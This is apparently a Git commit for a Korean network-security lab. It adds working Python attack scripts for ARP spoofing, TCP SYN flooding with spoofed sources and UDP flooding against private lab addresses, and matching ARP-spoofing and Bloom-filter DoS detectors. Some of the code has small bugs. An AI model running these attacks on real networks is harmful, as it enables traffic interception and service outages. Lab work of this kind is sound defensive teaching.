간단한 공격 및 탐지 실습

ReyDePlata
Commit a2dbc3d5a49e097b2151701204e921bd16065f62 a2dbc3d5 1 parent 2e25c5aa
Showing 6 changed files with 266 additions and 0 deletions
Lab/attack/ARPSpoofing/ARPSpoofing.py
Lab/attack/DoS/tcp_syn_flooding.py
Lab/attack/DoS/udp_flooding.py
Lab/detection/ARPSpoofingDetection/ARPSpoofingDetection.py
Lab/detection/DoSDetection/CountingBloom.py
Lab/detection/DoSDetection/DoSDetection.py
--- a/Lab/attack/ARPSpoofing/ARPSpoofing.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/attack/ARPSpoofing/ARPSpoofing.py 0 → 100644
View file @a2dbc3d
+from time import sleep
+from scapy.layers.inet import IP
+from scapy.layers.l2 import Ether, ARP
+from scapy.sendrecv import *
+
+def getMAC(ip):
+    answered, unanswered=srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=5, retry=3)
+    for s, r in answered:
+        return r.sprintf('%Ether.src%')
+
+def poisonARP(srcip, targetip, targetmac):
+    arp=ARP(op=2, psrc=srcip, pdst=targetip, hwdst=targetmac)
+    send(arp)
+
+def restoreARP(victimip, gatewayip, victimmac, gatewaymac):
+    arp1=ARP(op=2, pdst=victimip, psrc=gatewayip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=gatewaymac)
+    arp2=ARP(op=2, pdst=gatewayip, psrc=victimip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=victimmac)
+    send(arp1,count=3)
+    send(arp2,count=3)
+
+
+def main():
+    gatewayip='192.168.219.1'
+    victimip='192.168.219.102'
+
+    victimmac=getMAC(victimip)
+    gatewaymac=getMAC(gatewayip)
+
+    if victimmac == None or gatewaymac == None:
+        print('MAC 주소를 찾을 수 없습니다')
+        return
+    
+    print('ARP spoofing Start -> VICTIM IP [%s]' %victimip)
+    print('[%s]:POISON ARP table [%s] -> [%s]' %(victimip,gatewaymac,victimmac))
+
+    try:
+        while True:
+            poisonARP(gatewayip,victimip,victimmac)
+            poisonARP(victimip,gatewayip,gatewaymac)
+            sleep(3)
+    except KeyboardInterrupt:
+        restoreARP(victimip,gatewayip,victimmac,gatewaymac)
+        print('ARP spoofing finished -> RESTORED ARP Table')
+
+if __name__=='__main__':
+    main()        
--- a/Lab/attack/DoS/tcp_syn_flooding.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/attack/DoS/tcp_syn_flooding.py 0 → 100644
View file @a2dbc3d
+from scapy.all import *
+'''from scapy.layers.inet import TCP, UDP, ICMP, IP
+from scapy.layers.l2 import Ether
+from scapy.config import conf, ConfClass
+from scapy.sendrecv import *
+'''
+import os
+import random
+
+
+def RunFlood(vic_ip, vic_port, pkt_count):
+    port = vic_port
+    for i in range(0, pkt_count):
+        pkt_IP = IP()
+        pkt_IP.src = "%i.%i.%i.%i" % (random.randint(1,255),random.randint(1,255),random.randint(1,255), random.randint(1,255))
+        pkt_IP.dst = vic_ip
+        pkt_TCP = TCP()
+        pkt_IP.sport = RandShort()
+        pkt_IP.dport = vic_port
+        pkt_TCP.flags = 'S'
+        
+        raw = Raw(b"N"*1024) # payload
+        packet = pkt_IP/pkt_TCP/raw
+        send(packet,verbose=0)
+        print(pkt_IP.src, " to ", pkt_IP.dst)
+    print(x, "packets Sent.")
+
+
+
+def main():
+    RunFlood("192.168.219.110", 8080, 1000)
+
+if __name__ == "__main__":
+    main()
--- a/Lab/attack/DoS/udp_flooding.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/attack/DoS/udp_flooding.py 0 → 100644
View file @a2dbc3d
+import time
+import socket
+import random
+import sys 
+
+VICTIM_SERVER_IP="192.168.219.102"
+PORT_NUMBER = 123 # UDP방식 중 하나인 NTP서비스
+
+duration = 10 # 공격지속시간 10초
+
+client=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+bytes=random._urandom(1024) # 무작위 패킷내용 생성을 위한 난수
+timeout = time.time() + duration # duration 초과 여부 확인용
+
+sent = 0 
+
+while True:
+    if time.time() > timeout:
+        break
+    else:
+        pass
+    client.sendto(bytes, (VICTIM_SERVER_IP, PORT_NUMBER))
+    sent = sent + 1 
+    print("UDP Flooding Attack Start: " + str(sent) + " sent packets " + VICTIM_SERVER_IP + " At the port " + str(PORT_NUMBER))
+
--- a/Lab/detection/ARPSpoofingDetection/ARPSpoofingDetection.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/detection/ARPSpoofingDetection/ARPSpoofingDetection.py 0 → 100644
View file @a2dbc3d
+import scapy.all as scapy
+
+def get_mac(ip):
+   arp_request = scapy.ARP(pdst=ip)
+   broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
+   arp_request_broadcast =  broadcast/arp_request
+   answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
+   return answered_list[0][1].hwsrc
+
+def sniff(interface):
+        scapy.sniff(iface=interface, store=False, prn=proccess_sniffed_packet)
+
+def proccess_sniffed_packet(packet):
+        if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op == 2:
+                try:
+                        real_mac = get_mac(packet[scapy.ARP].psrc)
+                        response_mac = packet[scapy.ARP].hwsrc
+
+                        if real_mac != response_mac:
+                                print("ARP Spoofing Detected.")
+                except IndexError:
+                        pass
+
+
+sniff("wlan0")
--- a/Lab/detection/DoSDetection/CountingBloom.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/detection/DoSDetection/CountingBloom.py 0 → 100644
View file @a2dbc3d
+import hashlib
+import math
+import random
+from fnvhash import fnv1a_32 as fnv
+from fnvhash import fnv1_32 as f32
+import sys
+import threading
+
+class Counting_bloom_filter(object):
+    def __init__(self, elem_num, p): # elem_num : 삽입하고자 하는 원소 개수
+        self.elem_num = elem_num
+        self.positive = p # false-positive 비율
+        self.generate_parameter() 
+        self.init_bf()
+
+
+    def generate_parameter(self):
+        self.length = math.ceil(-(self.elem_num* math.log(self.positive))/((math.log(2)) ** 2)) # 배열 길이
+        self.hash_num = math.ceil((self.length/self.elem_num)*math.log(2)) # 
+
+
+    def init_bf(self):   
+        self.c_bf = [0] * self.length # array의 모든 원소에 대한 count는 0으로 초기화
+        
+    def insert_to_cbf(self, val):
+        keytable = []
+        loc1 = self.hash_func1(val)
+        self.c_bf[loc1] += 1
+        keytable.append(self.c_bf[loc1])
+        loc2 = self.hash_func2(val)
+        self.c_bf[loc2] += 1
+        keytable.append(self.c_bf[loc2])
+        loc3 = self.hash_func3(val)
+        self.c_bf[loc3] += 1
+        keytable.append(self.c_bf[loc3])
+        return min(keytable)
+        
+    def add_to_cbf(self, val): # cbf에 원소 삽입
+        # 최적의 해시 개수 hash_num에 대하여
+        # 3개라 가정하면, i값은 0~2까지
+        # 이 i값을 seed값 삼아 동일 sha1함수에 다른 seed값 부여하고 연산 진행
+        # 연산 결과 나온 key값이 loc, CBF 배열의 loc번째 인덱스에 increment연산 진행
+        # return값: 해당 값(0~threshold값 까지의 정수) 
+        for i in range(self.hash_num):
+            loc = self.hash_func3(val, i+1)
+            self.c_bf[loc] += 1
+        return self.c_bf[loc]
+
+
+    def hash_func1(self, val): #fnv32-1a
+        hashedVal = fnv(val.encode('utf-8'))
+        return hashedVal % self.length
+
+
+    def hash_func2(self, val): #MD5
+        MD5 = hashlib.md5()
+        MD5.update(val.encode('utf-8'))
+        hashedVal = int(MD5.hexdigest(), 16)
+        return hashedVal % self.length
+    
+
+    def hash_func3(self, val): #sha1
+        sha1 = hashlib.sha1()
+        sha1.update(str(val).encode('utf-8'))
+        val =  int(sha1.hexdigest(), 16)
+        return val % self.length
+
+
+def main():
+    a = Counting_bloom_filter(100,0.001) # 100개 ip주소를 cbf에 삽입, 원하는 이론상의 최대 false positive 수치: 0.1%
+    print(a.length) # 이 때의 배열의 길이
+    print(a.insert_to_cbf('172.14.2.48'))
+    print(a.hash_func1('172.14.2.48'))
+    print(a.hash_func2('172.14.2.48'))
+    print(a.hash_func3('172.14.2.48'))
+    #sh = hashlib.sha1() # ip주소의 경우에 적절치 못함(리턴하는 값이 너무 큼)
+    #re = sh.update('172.14.2.48'.encode('utf-8'))
+    #re =  int(sh.hexdigest(), 16) * a.hash_num
+    #print(re%a.length)
+    #print(a.look_up(10))
+    #a.add_to_cbf(10)
+if __name__ == '__main__': main()
\ No newline at end of file
--- a/Lab/detection/DoSDetection/DoSDetection.py 0 → 100644
View file @a2dbc3d
+++ b/Lab/detection/DoSDetection/DoSDetection.py 0 → 100644
View file @a2dbc3d
+import pyshark as pyshark
+import os
+import subprocess
+import CBF2 as CBF
+import threading
+import time
+import schedule
+
+#pps_threshold 설정 필요
+
+def LiveSniffer(net_interface, cbf):
+    capture = pyshark.LiveCapture(interface=net_interface, bpf_filter= 'dst 192.168.219.110 && tcp') # 캡쳐 프로세스 생성
+    capture.set_debug()
+    for packet in capture.sniff_continuously():
+        PktFiltering(packet, cbf)
+
+
+def PktFiltering(pkt, filter): # 패킷의 src IP address를 기반으로 flooding 공격 탐지(packet per second)
+    print(pkt.ip.src, " to ", pkt.ip.dst)
+    count = filter.insert_to_cbf(pkt.ip.src) # 해시결과들 중 최소값 리턴
+    print(count)
+    if count > 10: # cbf에 10 이상의 값이 매핑되어 있을 때 (threshold)
+        print("Anomal packet flow detected. source IP: ", pkt.ip.src, ", Suspicious Alert")
+        
+
+def CntDecrement(c_bf):
+    for k in range (len(c_bf)):
+        if c_bf[k]: 
+            c_bf[k] -= 1
+        else:
+            continue
+    print("Dec all completed.")
+
+
+
+def main():
+    print("capturing start")
+
+    try:
+        capture = pyshark.LiveCapture(interface='wlp2s0', bpf_filter='tcp', display_filter= 'ip.dst == 192.168.219.100') # 캡쳐 프로세스 생성
+        #capture.set_debug()
+        filter = CBF.Counting_bloom_filter(8000, 0.01) # CBF 초기화
+        print("CB-Filter Length: ", filter.length)
+        schedule.every(0.008).seconds.do(CntDecrement, filter.c_bf)
+        for packet in capture.sniff_continuously():
+            PktFiltering(packet, filter)
+            schedule.run_pending()
+
+    except KeyboardInterrupt:
+        print("\nPressed Ctrl+C: End Capturing")
+
+
+if __name__ == "__main__":
+    main()